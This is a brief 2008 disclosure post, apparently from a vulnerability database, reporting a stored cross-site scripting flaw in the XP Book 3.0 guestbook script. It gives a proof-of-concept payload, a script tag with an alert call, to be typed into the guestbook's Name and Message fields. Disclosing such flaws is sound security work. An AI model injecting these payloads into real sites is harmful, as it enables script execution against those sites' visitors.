Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19325
HistoryMar 03, 2008 - 12:00 a.m.

XSS in XP Book version 3.0

2008-03-0300:00:00
vulners.com
10

Hello ,

I haven't send any new bugs for long time :)

Vulnerable : XP Book v3.0
coded by http://kuwaitiphp.alruban.net

  • i think their website doesn't work at the moment

exploit :
open http://www.example.com/xpbook/entry.php

then type in
Name:
'><script>alert(xss);</script>
Email :
[email protected]

Message :
'><script>alert(xss);</script>

then press Send ! and the code that we typed is going to work !

discovered by / Linux_Drox
www.LeZr.Com

Best regards ,